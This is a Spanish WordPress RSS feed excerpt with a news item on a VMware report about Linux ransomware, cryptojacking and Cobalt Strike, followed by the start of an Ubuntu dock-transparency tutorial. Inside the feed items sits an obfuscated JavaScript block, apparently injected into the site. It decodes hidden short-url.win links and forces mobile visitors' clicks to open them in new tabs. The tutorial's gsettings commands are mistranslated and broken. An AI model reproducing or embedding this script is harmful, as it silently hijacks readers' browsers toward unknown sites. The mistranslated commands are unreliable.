_0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/arch-linux-desbanca-a-ubuntu-en-la-encuesta-de-steam-de-mayo/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">97110</post-id>	</item>
		<item>
		<title>Los cibercriminales atacan los sistemas basados en Linux con ataques de ransomware y criptosecuestro</title>
		<link>https://www.todoenunclick.com/los-cibercriminales-atacan-los-sistemas-basados-en-linux-con-ataques-de-ransomware-y-criptosecuestro/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Mon, 07 Mar 2022 20:24:40 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[ataques]]></category>
		<category><![CDATA[cibercriminales]]></category>
		<category><![CDATA[criptosecuestro]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[Ransomware]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=2020</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2022/03/Linux-Rasonware.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/03/Linux-Rasonware.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/03/Linux-Rasonware.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/03/Linux-Rasonware.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/03/Linux-Rasonware.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/03/Linux-Rasonware.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/03/Linux-Rasonware.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/03/Linux-Rasonware.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:heading {"level":5} -->
<h5><em>El informe de VMware revela que más de la mitad de los usuarios de Cobalt Strike están utilizando la herramienta ilícitamente</em></h5>
<!-- /wp:heading -->

<!-- wp:separator {"className":"is-style-wide"} -->
<hr class="wp-block-separator is-style-wide"/>
<!-- /wp:separator -->

<!-- wp:paragraph -->
<p>Como el sistema operativo de nube más común, Linux es una parte fundamental de la infraestructura digital y se está convirtiendo rápidamente en el tiquete de acceso de los atacantes al  entorno de nubes múltiples. Las contramedidas actuales de malware se centran principalmente en como abordar las amenazas basadas en Windows, lo que deja a muchas implementaciones de nubes públicas y privadas vulnerables a ataques dirigidos a cargas de trabajo basadas en Linux.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>VMware, Inc. (NYSE: VMW)&nbsp;<a href="https://www.vmware.com/resources/security/exposing-malware-in-multi-cloud.html?utm_source=pr&amp;utm_medium=referral&amp;utm_campaign=linux-threat-report&amp;utm_term=none&amp;utm_content=none">publicó</a>&nbsp;un informe sobre las amenazas titulado “Exponer malware en entornos de nubes múltiples basados en Linux”.<sup>(1)</sup>&nbsp;Entre las principales conclusiones que detallan cómo los cibercriminales utilizan el malware para atacar los sistemas operativos basados en Linux se incluyen:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul><li>Ransomware está evolucionando para atacar imágenes de host de Linux utilizadas para hacer girar cargas de trabajo en entornos virtualizados;</li><li>El 89% de los ataques de criptosecuestros utilizan bibliotecas relacionadas con XMRig; y</li><li>Más de la mitad de los usuarios de Cobalt Strike pueden ser cibercriminales o, al menos, utilizar Cobalt Strike de forma ilícita.</li></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>“Los cibercriminales están ampliando drásticamente su alcance y añadiendo malware dirigido a los sistemas operativos basados en Linux a su kit de herramientas de ataque para maximizar su impacto con el menor esfuerzo posible”, afirmó Giovanni Vigna, director senior de inteligencia frente a amenazas de VMware. “En lugar de infectar una terminal y luego navegar hacia un objetivo de mayor valor, los cibercriminales han descubierto que poner en peligro un único servidor puede ofrecer una mayor recompensa y el acceso que buscan. Los atacantes consideran las nubes públicas y privadas como objetivos de gran valor debido al acceso que proporcionan a los servicios de infraestructura críticos y a los datos confidenciales. Lamentablemente, las actuales contramedidas relativas al malware se centran principalmente en como abordar las amenazas basadas en Windows, lo que hace que muchas implementaciones de nubes públicas y privadas sean vulnerables a los ataques contra sistemas operativos basados en Linux”.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>A medida que el malware dirigido a sistemas operativos basados en Linux aumenta tanto en volumen como en complejidad en medio de un panorama de amenazas en constante cambio, las organizaciones deben dar mayor prioridad a la detección de amenazas. En este informe, la Unidad de Análisis de Amenazas de VMware (TAU)&nbsp; analizó las amenazas a los sistemas operativos basados en Linux en los entornos de nubes múltiples: ransomware, criptomineros y herramientas de acceso remoto.</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":5} -->
<h5><strong>El ransomware apunta a la nube para infligir el máximo daño</strong></h5>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Como una de las&nbsp;<a href="https://www.carbonblack.com/resources/global-security-insights-report-2021-intelligence-from-the-global-cybersecurity-landscape/?lp=1&amp;utm_source=twitter&amp;utm_medium=social&amp;utm_campaign=social-organic&amp;utm_term=none&amp;utm_content=report">principales causas de incumplimiento</a>&nbsp;para las organizaciones, un ataque de ransomware exitoso en un entorno de nube puede tener consecuencias devastadoras.<sup>(2)&nbsp;</sup>Los ataques de ransomware contra las implementaciones en la nube están dirigidos y a menudo se combinan con la filtración de datos, implementando un esquema de extorsión doble que mejora las probabilidades de éxito. Un nuevo desarrollo muestra que el ransomware está evolucionando para atacar imágenes de host Linux utilizadas para hacer girar las cargas de trabajo en entornos virtualizados. Los atacantes buscan ahora los activos más valiosos en entornos de nube para infligir la máxima cantidad de daño al objetivo. Entre los ejemplos se incluyen la familia de ransomware Defray777, que encriptó imágenes de host en servidores ESXi, y la familia de ransomware DarkSide, que paralizó las redes de Colonial Pipeline y causó una escasez de gasolina en todo el país en los Estados Unidos</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":5} -->
<h5><strong>Los ataques de criptosecuestros usan XMRig para minar Monero</strong></h5>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Los cibercriminales que buscan una recompensa monetaria instantánea a menudo atacan a las criptomonedas utilizando uno de dos enfoques. Los cibercriminales incluyen la funcionalidad de robo de carteras en malware o monetizan los ciclos de CPU robados para extraer con éxito criptomonedas en un ataque llamado criptosecuestro. La mayoría de los ataques de criptosecuestros se centran en la minería de la moneda Monero (o XMR) y VMware TAU descubrió que el 89% de los criptomineros utilizaban bibliotecas relacionadas con XMRig. Es por esto que, cuando se identifican las bibliotecas y módulos específicos de XMRig en los binarios de Linux, es probable que se produzca un comportamiento criptominero malicioso. VMware TAU también observó que la evasión de defensa es la técnica más utilizada por los criptomineros. Desafortunadamente, debido a que los ataques de criptosecuestros no interrumpen completamente las operaciones de entornos de nube como el ransomware, son mucho más difíciles de detectar.</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":5} -->
<h5><strong>Cobalt Strike es la herramienta de acceso remoto preferida por los atacantes</strong></h5>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Para obtener el control y persistir en un entorno, los atacantes buscan instalar un implante en un sistema comprometido que les proporcione un control parcial de la máquina. El malware, los webshells y las herramientas de acceso remoto (RATs) pueden ser implantes utilizados por los atacantes en un sistema comprometido para permitir el acceso remoto. Uno de los implantes principales utilizados por los atacantes es Cobalt Strike, una herramienta de prueba de penetración comercial y equipo rojo, y su reciente variante Vermilion Strike basada en Linux. Dado que Cobalt Strike es una amenaza tan ubicua para Windows, la expansión al sistema operativo basado en Linux demuestra el deseo de los atacantes de utilizar herramientas de fácil acceso que se dirigen al mayor número posible de plataformas.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>VMware TAU descubrió más de 14,000 servidores activos de Cobalt Strike Team en Internet entre febrero de 2020 y noviembre de 2021. El porcentaje total de ID de clientes de Cobalt Strike descifrados y filtrados es del 56%, lo que significa que más de la mitad de los usuarios de Cobalt Strike pueden ser cibercriminales o, al menos, utilizan Cobalt Strike de forma ilícita. El hecho de que RATs como Cobalt Strike y Vermilion Strike se hayan convertido en herramientas básicas para los cibercriminales representa una amenaza significativa para las compañías.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>“Desde que realizamos nuestro análisis, se observó que aún más familias de ransomware gravitan al malware dirigido a sistemas basados en Linux, con el potencial de ataques adicionales que podrían aprovechar las vulnerabilidades Log4j”, dijo Brian Baskin, director de investigación de amenazas de VMware. “Los resultados de este informe se pueden utilizar para comprender mejor la naturaleza de este malware y mitigar la creciente amenaza que tienen el ransomware, el criptominado y las RATS en entornos de nubes múltiples. A medida que los ataques dirigidos a la nube sigan evolucionando, las organizaciones deben adoptar un enfoque de confianza cero para integrar la seguridad en toda su infraestructura y abordar sistemáticamente los vectores de amenazas que conforman su superficie de ataque”.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Descargue el informe completo</strong><strong>&nbsp;</strong><a href="https://www.vmware.com/resources/security/exposing-malware-in-multi-cloud.html?utm_source=pr&amp;utm_medium=referral&amp;utm_campaign=linux-threat-report&amp;utm_term=none&amp;utm_content=none"><strong>aquí</strong></a><strong>.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":5} -->
<h5><strong>Metodología</strong></h5>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>La Unidad de Análisis de Amenazas de VMware (TAU) ayuda a proteger a los clientes de ciberataques mediante la innovación y la investigación de primera categoría. TAU está compuesto por analistas de malware, ingenieros de ingeniería inversa, cazadores de amenazas, científicos de datos y analistas de inteligencia de VMware. Para comprender cómo detectar y prevenir ataques que omiten las estrategias de prevención tradicionales centradas en archivos, TAU se centra en técnicas que en su momento eran el dominio de los hackers avanzados y que ahora están avanzando hacia el mercado de ataques de productos básicos. El equipo aprovecha el big data en tiempo real, el procesamiento de transmisión de eventos, el análisis estático, dinámico y de comportamiento y el aprendizaje automático.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>TAU aplicó una composición de técnicas estáticas y dinámicas para caracterizar varias familias de malware observadas en sistemas basados en Linux basándose en un conjunto de datos curados de metadatos asociados con binarios de Linux. Todas las muestras de este conjunto de datos son públicas y, por lo tanto, se puede acceder fácilmente a ellas mediante VirusTotal o varios sitios web de las principales distribuciones de Linux. TAU recopiló más de 11,000 muestras benignas de varias distribuciones de Linux, a saber, Ubuntu, Debian, Mint, Fedora, CentOS y Kali. TAU luego recopiló un conjunto de datos de muestras para dos clases de amenazas, a saber, ransomware y criptomineros. Por último, TAU recopiló un conjunto de datos de binarios ELF maliciosos de VirusTotal que se utilizaron como un conjunto de datos maliciosos de prueba. TAU comenzó a recopilar el conjunto de datos en junio de 2021 y concluyó en noviembre de 2021.</p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/los-cibercriminales-atacan-los-sistemas-basados-en-linux-con-ataques-de-ransomware-y-criptosecuestro/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">96699</post-id>	</item>
		<item>
		<title>Cómo cambiar la transparencia del panel izquierdo del Dock en Ubuntu 21.04 / Ubuntu 21.10</title>
		<link>https://www.todoenunclick.com/como-cambiar-la-transparencia-del-panel-izquierdo-del-dock-en-ubuntu-21-04-ubuntu-21-10/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Sun, 13 Feb 2022 23:02:35 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[Dock. Ubuntu 21.04]]></category>
		<category><![CDATA[GNU Linux]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[panel]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[transparencia]]></category>
		<category><![CDATA[tutoriales]]></category>
		<category><![CDATA[Ubuntu]]></category>
		<category><![CDATA[Ubuntu 21.10]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=1906</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2022/02/ubuntu-dock-transparency.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/02/ubuntu-dock-transparency.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/02/ubuntu-dock-transparency.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/02/ubuntu-dock-transparency.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/02/ubuntu-dock-transparency.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/02/ubuntu-dock-transparency.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/02/ubuntu-dock-transparency.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/02/ubuntu-dock-transparency.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>¿Te gustan los paneles transparentes en el escritorio? A continuación te explicamos cómo configurar el panel izquierdo (o inferior), el lanzador del dock, para que sea transparente en Ubuntu.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Es fácil habilitar la transparencia del panel superior a través de la extensión Gnome Shell, por ejemplo, <a href="https://extensions.gnome.org/extension/1011/dynamic-panel-transparency/" data-type="URL" data-id="https://extensions.gnome.org/extension/1011/dynamic-panel-transparency/" target="_blank" rel="noreferrer noopener">Dynamic Panel Transparency</a> . Para la base izquierda o inferior, la extensión Dash-to-Dock integrada en el sistema tiene una opción para cambiar la opacidad del fondo.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Sistemas compatibles:</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El tutorial está funcionando en las siguientes ediciones de Ubuntu:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul><li>Ubuntu 20.04.</li><li>Ubuntu 20.10.</li><li>Ubuntu 21.04</li><li>Ubuntu 21.10</li></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p><strong>Comando único para configurar la transparencia del dock:</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para aquellos familiarizados con los comandos de Linux, abra la terminal presionando la combinación de teclas Ctrl+Alt+T en el teclado. Cuando se abra, copie y pegue el siguiente comando y presione Enter:</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph {"backgroundColor":"black","textColor":"white"} -->
<p class="has-white-color has-black-background-color has-text-color has-background">gsettings establece org.gnome.shell.extensions.dash-to-dock background-opacity 0.2</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Cambie 0.2 a su valor deseado que va de 0 a 1, donde 0 es totalmente transparente y 1 es opaco.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para volver al valor predeterminado ( 0.7 ), ejecute el comando en la terminal:</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph {"backgroundColor":"black","textColor":"white"} -->
<p class="has-white-color has-black-background-color has-text-color has-background">gsettings restablecer org.gnome.shell.extensions.dash-to-dock background-opacity</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Cambie la opacidad del fondo a través de la herramienta gráfica: Dconf Editor</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
